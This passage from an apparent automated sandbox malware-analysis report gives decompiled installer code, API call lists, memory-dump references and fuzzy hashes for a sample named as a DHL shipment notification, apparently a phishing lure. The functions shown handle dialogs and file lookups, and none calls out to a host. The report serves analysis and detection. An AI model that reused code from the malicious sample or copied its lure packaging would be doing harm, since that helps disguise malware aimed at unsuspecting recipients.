							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                        0x004021b3
                        0x004021bd
                        0x004021c7
                        0x004021d1
                        0x004021dc
                        0x004021df
                        0x004021f9
                        0x004021fc
                        0x00402202
                        0x00402205
                        0x0040220f
                        0x00402213
                        0x00402213
                        0x00402218
                        0x00402229
                        0x00402231
                        0x004022e8
                        0x004022e8
                        0x004022ef
                        0x00402237
                        0x00402237
                        0x00402246
                        0x0040224a
                        0x0040224d
                        0x00402253
                        0x00402261
                        0x00402264
                        0x00402266
                        0x00402271
                        0x00402271
                        0x00402276
                        0x00402278
                        0x0040227f
                        0x0040227f
                        0x00402282
                        0x0040228b
                        0x0040228e
                        0x00402294
                        0x00402296
                        0x004022a0
                        0x004022a0
                        0x004022a3
                        0x004022ac
                        0x004022af
                        0x004022b8
                        0x004022be
                        0x004022c0
                        0x004022ce
                        0x004022ce
                        0x004022d1
                        0x004022d7
                        0x004022d7
                        0x004022da
                        0x004022e0
                        0x004022e6
                        0x004022fb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004022e6
                        0x004022f1
                        0x00402c2d
                        0x00402c39

                        APIs
                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CreateInstance
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 542301482-47812868
                        • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                        • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
                        • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                        • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 39%
                        			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040666E();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                        0x00402923
                        0x0040293e
                        0x00402949
                        0x0040294a
                        0x00402a94
                        0x00402925
                        0x00402928
                        0x0040292b
                        0x0040292e
                        0x0040292e
                        0x00402c2d
                        0x00402c39

                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FileFindFirst
                        • String ID:
                        • API String ID: 1974802433-0
                        • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                        • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
                        • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                        • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405037 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x7a8ac8;
				_v28 =  *0x7a8ab0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x7a8ab9 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F85(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x7a1f6c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x7a1f80;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x7a1f6c = 0;
								 *0x7a1f80 = 0;
								 *0x7a8b00 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00405005();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x7a1f80;
									_t201 =  *0x7a8ac8;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a8acc <= 0) {
										L86:
										if( *0x7a8b5e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x7a8acc);
									goto L86;
								} else {
									_t293 = E004012E2( *0x7a1f80);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x7a8b00 = _t291;
					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
					_t297 = _t258;
					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f6c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045CA(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045CA(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x7a8acc <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x7a1f80 + _t300 * 4) = _t284;
									_v16 =  *( *0x7a1f80 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x7a8acc);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045FF(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045FF(_v12);
								L93:
								return E00404631(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                        0x0040503e
                        0x00405057
                        0x0040505c
                        0x00405064
                        0x0040506a
                        0x00405080
                        0x00405083
                        0x004052ae
                        0x004052b5
                        0x004052c9
                        0x004052b7
                        0x004052b9
                        0x004052bc
                        0x004052bd
                        0x004052c4
                        0x004052c4
                        0x004052d5
                        0x004052e3
                        0x004052e6
                        0x004052fc
                        0x00405371
                        0x00405374
                        0x00405376
                        0x00405380
                        0x0040538e
                        0x0040538e
                        0x00405390
                        0x0040539a
                        0x004053a0
                        0x004053a3
                        0x004053a6
                        0x004053c1
                        0x004053a8
                        0x004053b2
                        0x004053b2
                        0x004053a6
                        0x0040539a
                        0x00000000
                        0x00405374
                        0x00405301
                        0x0040530c
                        0x00405311
                        0x00405318
                        0x0040531d
                        0x00405321
                        0x0040532c
                        0x0040532c
                        0x00405330
                        0x00405334
                        0x00405338
                        0x0040534b
                        0x0040533a
                        0x0040533a
                        0x00405341
                        0x00405347
                        0x00405343
                        0x00405343
                        0x00405343
                        0x00405341
                        0x0040534f
                        0x00405351
                        0x00405364
                        0x00405367
                        0x0040536a
                        0x0040536a
                        0x00405334
                        0x00000000
                        0x00405321
                        0x00405303
                        0x0040530a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004053c4
                        0x004053c4
                        0x004053cb
                        0x0040543c
                        0x00405444
                        0x0040544c
                        0x0040544c
                        0x00405455
                        0x00405457
                        0x0040545e
                        0x00405461
                        0x00405461
                        0x00405467
                        0x0040546e
                        0x00405471
                        0x00405471
                        0x00405477
                        0x0040547d
                        0x00405483
                        0x00405483
                        0x00405490
                        0x004055f1
                        0x004055f8
                        0x00405615
                        0x0040561b
                        0x0040562d
                        0x0040562d
                        0x00000000
                        0x00405496
                        0x00405498
                        0x0040549d
                        0x004054a2
                        0x004054a7
                        0x004054a9
                        0x004054a9
                        0x004054aa
                        0x004054ab
                        0x004054ad
                        0x004054ad
                        0x004054b5
                        0x004054f6
                        0x004054f8
                        0x00405508
                        0x0040550b
                        0x00405510
                        0x00405517
                        0x0040551a
                        0x004055bc
                        0x004055c5
                        0x004055cd
                        0x004055cd
                        0x004055db
                        0x004055ec
                        0x004055ec
                        0x00000000
                        0x004055db
                        0x00405520
                        0x00405523
                        0x00405529
                        0x0040552e
                        0x00405530
                        0x00405532
                        0x00405538
                        0x0040553f
                        0x00405544
                        0x0040554b
                        0x0040554e
                        0x0040554e
                        0x00405555
                        0x00405561
                        0x00405565
                        0x00405567
                        0x00405567
                        0x00405557
                        0x00405559
                        0x00405559
                        0x00405587
                        0x00405593
                        0x004055a2
                        0x004055a2
                        0x004055a4
                        0x004055a7
                        0x004055b0
                        0x00000000
                        0x004054b7
                        0x004054c2
                        0x004054c5
                        0x004054ca
                        0x004054cc
                        0x004054d0
                        0x004054e0
                        0x004054ea
                        0x004054ec
                        0x004054ef
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004054d2
                        0x004054d2
                        0x004054d8
                        0x004054da
                        0x004054da
                        0x004054db
                        0x004054dc
                        0x00000000
                        0x004054d2
                        0x004054b5
                        0x00405490
                        0x004053d3
                        0x00000000
                        0x004053e9
                        0x004053f3
                        0x004053f8
                        0x00000000
                        0x00000000
                        0x0040540a
                        0x0040540f
                        0x0040541b
                        0x0040541b
                        0x0040541d
                        0x0040542c
                        0x0040542e
                        0x00405432
                        0x00405435
                        0x00000000
                        0x00405435
                        0x004053d3
                        0x00405089
                        0x0040508e
                        0x00405097
                        0x0040509e
                        0x004050b0
                        0x004050bb
                        0x004050c1
                        0x004050cf
                        0x004050e3
                        0x004050e8
                        0x004050f5
                        0x004050fa
                        0x00405110
                        0x00405121
                        0x0040512e
                        0x0040512e
                        0x00405131
                        0x00405137
                        0x00405139
                        0x0040513c
                        0x00405141
                        0x00405146
                        0x00405148
                        0x00405148
                        0x00405168
                        0x00405168
                        0x0040516a
                        0x0040516b
                        0x00405170
                        0x00405176
                        0x0040517a
                        0x0040517f
                        0x00405187
                        0x0040518b
                        0x00405190
                        0x00405195
                        0x0040519d
                        0x004051a0
                        0x00405270
                        0x00405283
                        0x00000000
                        0x004051a6
                        0x004051a9
                        0x004051ac
                        0x004051af
                        0x004051af
                        0x004051b5
                        0x004051be
                        0x004051c1
                        0x004051c5
                        0x004051c8
                        0x004051cb
                        0x004051d4
                        0x004051dd
                        0x004051e0
                        0x004051e3
                        0x004051e6
                        0x00405224
                        0x0040524f
                        0x00405226
                        0x00405235
                        0x00405235
                        0x004051e8
                        0x004051eb
                        0x004051f9
                        0x00405203
                        0x0040520b
                        0x00405212
                        0x0040521d
                        0x0040521d
                        0x004051e6
                        0x00405255
                        0x00405256
                        0x00405262
                        0x00405262
                        0x0040526e
                        0x00405289
                        0x0040528c
                        0x004052a9
                        0x00000000
                        0x0040528e
                        0x00405293
                        0x0040529c
                        0x0040562f
                        0x00405641
                        0x00405641
                        0x0040528c
                        0x00000000
                        0x0040526e
                        0x004051a0

                        APIs
                        • GetDlgItem.USER32 ref: 0040504F
                        • GetDlgItem.USER32 ref: 0040505A
                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
                        • LoadImageW.USER32 ref: 004050BB
                        • SetWindowLongW.USER32(?,000000FC,00405644), ref: 004050D4
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
                        • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
                        • DeleteObject.GDI32(00000000), ref: 00405131
                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
                          • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
                        • GetWindowLongW.USER32(?,000000F0), ref: 00405275
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405283
                        • ShowWindow.USER32(?,00000005), ref: 00405293
                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
                        • ImageList_Destroy.COMCTL32(?), ref: 00405461
                        • GlobalFree.KERNEL32 ref: 00405471
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
                        • ShowWindow.USER32(?,00000000), ref: 0040561B
                        • GetDlgItem.USER32 ref: 00405626
                        • ShowWindow.USER32(00000000), ref: 0040562D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                        • String ID: $M$N
                        • API String ID: 2564846305-813528018
                        • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                        • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
                        • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                        • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404789 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				char _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79ff54 =  *0x79ff54 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404631(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x7a6a40;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								_t44 =  &_v8; // 0x7a6a40
								E00404A38(_a4,  *_t44);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
						goto L27;
					} else {
						_t116 =  *0x7a0f60 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A14();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
